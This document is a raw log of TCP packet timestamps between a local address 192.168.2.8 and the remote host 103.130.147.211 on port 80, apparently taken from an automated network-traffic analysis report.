                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670685053 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670695066 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670696020 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670706034 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670717001 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670725107 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670739889 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670743942 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670759916 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670773029 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670785904 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670789003 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670804977 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670804977 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670815945 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670825958 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670839071 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670852900 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670866013 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670874119 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670895100 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670897007 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670916080 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.670948029 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.681794882 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.681842089 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.681855917 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.681955099 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.681955099 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.681955099 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.681982040 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682003021 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682014942 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682024956 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682035923 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682051897 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682063103 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682080984 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682106972 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682142019 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682143927 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682156086 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682190895 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682214022 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682221889 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682234049 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682252884 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682264090 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682265997 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682287931 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682315111 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682338953 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682367086 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682383060 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682420969 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682447910 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682460070 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682477951 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682492018 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682516098 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682538986 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682650089 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682662964 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682683945 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682693005 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682699919 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682714939 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682718039 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682737112 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682743073 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682781935 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682805061 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682847977 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682924986 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682935953 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682955027 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682965994 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682971001 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682992935 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.682992935 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683007956 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683032036 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683054924 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683238029 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683253050 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683269978 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683280945 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683281898 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683300972 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683300972 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683314085 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683329105 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683329105 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683352947 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683362961 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683408022 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683459044 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683470964 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683502913 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683536053 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683607101 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683624029 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683639050 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683646917 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683649063 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683670998 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683672905 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683689117 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683700085 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683717966 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683746099 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683844090 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683855057 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683873892 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683886051 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683887959 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683903933 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683912039 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683917046 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683937073 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683948994 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683949947 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683969021 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683974028 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.683999062 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684036016 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684222937 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684241056 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684263945 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684269905 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684276104 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684293985 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684300900 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684310913 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684325933 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684325933 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684346914 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684365034 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684366941 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684385061 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684395075 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684434891 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684575081 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684587002 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684619904 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684653997 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684680939 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684693098 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684712887 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684726954 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684727907 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684746027 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684753895 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684757948 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684777975 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684794903 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684798956 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684823990 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.684847116 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685033083 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685045958 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685058117 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685077906 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685116053 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685327053 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685367107 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685372114 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685376883 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685411930 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685437918 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685445070 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685448885 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685471058 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685477018 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685503006 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685528994 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685539007 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685550928 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685580969 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685606956 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685791016 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685838938 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685858011 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685868025 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685898066 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685900927 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685921907 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685946941 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685982943 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.685996056 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686013937 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686024904 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686026096 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686049938 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686075926 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686527967 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686570883 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686575890 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686583042 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686614990 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686636925 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686652899 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686665058 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686682940 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686697006 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686697006 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686719894 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686727047 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686738014 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686752081 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686800003 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686835051 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686846972 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686861992 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686872005 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686913013 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686913013 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686939001 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686959982 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686968088 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.686996937 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.687015057 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700598955 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700622082 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700630903 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700666904 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700695992 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700695992 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700709105 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700727940 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700741053 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700781107 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700798988 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700810909 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700825930 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700841904 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.700875998 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720658064 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720669031 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720689058 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720709085 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720722914 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720738888 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720755100 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720757961 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720807076 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720809937 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.720848083 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759515047 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759591103 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759607077 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759639978 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759674072 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759722948 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759733915 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759741068 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759746075 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759784937 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759808064 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759852886 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759876013 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759887934 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759896040 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759907007 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759913921 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759936094 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759957075 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759983063 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.759993076 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.760009050 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.760023117 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.760026932 CEST8049735103.130.147.211192.168.2.8
